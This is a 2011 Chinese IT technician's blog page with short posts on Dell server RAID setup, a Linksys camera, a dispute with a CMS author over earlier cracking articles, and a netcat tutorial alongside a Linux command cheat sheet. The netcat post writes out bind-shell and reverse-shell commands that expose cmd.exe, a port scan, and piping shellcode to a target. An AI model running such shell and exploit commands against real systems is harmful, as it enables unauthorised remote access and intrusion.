记录一个IT技术员的生活与技术
Written by 正冰 on 2011, June 28, 2:25 PM
Written by 正冰 on 2011, June 28, 9:11 AM
近期一直在忙碌着在新的城市稳定工作,偶有闲暇就上网看下资讯,今天发现我的博客pr已经上升为4,一个不错的成绩。继续努力!
Written by 正冰 on 2011, June 7, 2:40 PM
最近在测试DELL PowerEdge 2950服务器,拿到的是07年产的机器,可以通过开机按Ctrl+C进行SAS的RAID配置,或者用DELL引导盘进行RAID,不过SAS 5/6 IR只支持做Raid0和1,无论是通过BIOS里配置或者是引导盘配置。而把超过4块硬盘放进去,只能识别前4块硬盘。
具体RAID 0 与RAID 1配置见:SAS 5/6 I/R 完全配置手册
DELL 2950配置Raid操作:http://laowu2517.blog.51cto.com/1082855/241040
其他DELL 资料:阵列配置 管理工具 系统完全攻略集 绝对完整的资料
PowerEdge服务器产品技术论坛:http://support1.ap.dell.com/cn/zh/forum/forum.asp?fid=8
各RAID级别最少需要的硬盘数量:RAID0=1 RAID1=2 RAID5=3 RAID10=4 RAID50=6
分享下热备盘、全局热备以及阵列热备盘的区别:热备盘,在发现其他硬盘有损坏趋势或已损坏时,备份损坏盘中的内容。全局热备就是对除热备盘外的所有硬盘起作用,阵列热备只对指定阵列起作用。
Written by 正冰 on 2011, May 11, 1:07 PM
今天拿到一颗Linksys的网络摄像头WVC200,英文名是:Linksys Wireless-G PTZ Internet Camera with Audio,型号:WVC200。这款产品的配置信息参见《Cisco-Linksys WVC200》
摄像头初始通过DHCP服务获取IP地址,最简单的方式就是用一个简单的路由器为摄像头分配好IP,然后通过连接到路由器线路的电脑进入摄像头管理界面进行配置。
具体配置参考以下2篇文章:
我所看到的摄像头固件版本(Firmware)是:V1.1.0,去官方网站(Linksys最初于1988年创立,2003年被思科收购,所以产品都合并到思科旗下)http://www.cisco.com/ 查阅信息,最新版本固件是V1.2.2。下载地址如下:
Software for Cisco WVC200 Wireless-G PTZ Internet Video Camera - Audio : WVC200_EU_V1.2.2R00.bin
Written by 正冰 on 2011, May 8, 9:16 PM
这篇文章写给“理想家园企业建站CMS系统”的作者:
基于以上情况,我开放了对“理想家园企业建站CMS系统”破解的2篇文章的访问。而后续因为asp代码问题向你请教也仅仅只是技术交流,而你的言谈我已经感觉到你对之前的破解仍然耿耿于怀,我觉得我并不是想以破解你的系统来为我这个博客带来流量,而仅仅是技术交流。目前2篇文章均停止对外开放访问,我向你请教的2个问题只是基于学习的心态来问你……
人与人交流是基于相互理解的,我可能当初并没有理解到你话里深刻的含义去关闭那两篇文章而导致的,不过,我仍然觉得,我所做的仅仅是一个简单的技术交流。系统,依旧会有人破解,不会是我,还会有更多人。
Written by 正冰 on 2011, May 8, 5:49 PM
越来越多的web服务器开始选择跑nginx,而两个平台的rewriterule却不相同,有这么一个网站,可以解决这个问题:
Written by 正冰 on 2011, May 5, 9:59 PM
'nc.exe -h'即可看到各参数的使用方法。
基本格式:nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
1)连接到远程主机
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听本地主机
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描远程主机
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
4)REMOTE主机绑定SHELL,例子:
格式:nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解:绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口
5)REMOTE主机绑定SHELL并反向连接,例子:
格式:nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口
以上为最基本的几种用法(其实NC的用法还有很多,
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......)。
6)作攻击程序用,例子:
格式1:type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2:nc -nvv 192.168.x.x 80 < c:\exploit.txt
讲解:连接到192.168.x.x的80端口,并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的效果,真是有异曲同工之妙:P)
附:'c:\exploit.txt'为shellcode等
7)作蜜罐用[1],例子:
格式:nc -L -p 80
讲解:使用'-L'(注意L是大写)可以不停地监听某一个端口,直到ctrl+c为止
8)作蜜罐用[2],例子:
格式:nc -L -p 80 > c:\log.txt
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,同时把结果输出到'c:\log.txt'中,如果把‘>'
改为‘>>'即可以追加日志
附:'c:\log.txt'为日志等
9)作蜜罐用[3],例子:
格式1:nc -L -p 80 < c:\honeypot.txt
格式2:type.exe c:\honeypot.txt|nc -L -p 80
讲解:使用'-L'可以不停地监听某一个端口,直到ctrl+c为止,并把'c:\honeypot.txt'的内容‘送'入其管道中!
10)备份档案
A机的资料夹 /data备份到B主机的backup.tgz
源主机: tar czf - work|nc -l -c -p 1234
目的主机: nc 192.168.0.1 1234 >a.tgz
或
A:tar -zcf data|nc -l -p 4444
B:nc a 4444 >backup.tgz
传完后ctrl+c中断连接,这样A主机不会生成档案直接传到了backup.tgz,缺点就是不知道啥时候传完,嘿嘿
Written by 正冰 on 2011, May 5, 9:33 PM
从网上摘录而来,方便自己。如果需要一次性返回多条命令结果,可以在命令中间加连接符“&”。
# uname -a # 查看内核/操作系统/CPU信息
# head -n 1 /etc/issue # 查看操作系统版本
# cat /proc/cpuinfo # 查看CPU信息
# hostname # 查看计算机名
# lspci -tv # 列出所有PCI设备
# lsusb -tv # 列出所有USB设备
# lsmod # 列出加载的内核模块
# env # 查看环境变量资源
# free -m # 查看内存使用量和交换区使用量
# df -h # 查看各分区使用情况
# du -sh <目录名> # 查看指定目录的大小
# grep MemTotal /proc/meminfo # 查看内存总量
# grep MemFree /proc/meminfo # 查看空闲内存量
# uptime # 查看系统运行时间、用户数、负载
# cat /proc/loadavg # 查看系统负载磁盘和分区
# mount | column -t # 查看挂接的分区状态
# fdisk -l # 查看所有分区
# swapon -s # 查看所有交换分区
# hdparm -i /dev/hda # 查看磁盘参数(仅适用于IDE设备)
# dmesg | grep IDE # 查看启动时IDE设备检测状况网络
# ifconfig # 查看所有网络接口的属性
# iptables -L # 查看防火墙设置
# route -n # 查看路由表
# netstat -lntp # 查看所有监听端口
# netstat -antp # 查看所有已经建立的连接
# netstat -s # 查看网络统计信息进程
# ps -ef # 查看所有进程
# top # 实时显示进程状态用户
# w # 查看活动用户
# id <用户名> # 查看指定用户信息
# last # 查看用户登录日志
# cut -d: -f1 /etc/passwd # 查看系统所有用户
# cut -d: -f1 /etc/group # 查看系统所有组
# crontab -l # 查看当前用户的计划任务服务
# chkconfig –list # 列出所有系统服务
# chkconfig –list | grep on # 列出所有启动的系统服务程序
# rpm -qa # 查看所有安装的软件包
# cat /proc/cpuinfo :查看CPU相关参数
# cat /proc/partitions :查看硬盘和分区
# cat /proc/meminfo :查看内存信息
# cat /proc/version :查看版本,类似uname -r
# cat /proc/ioports :查看设备io端口
# cat /proc/interrupts :查看中断
# cat /proc/pci :查看pci设备的信息
# cat /proc/swaps :查看所有swap分区的信息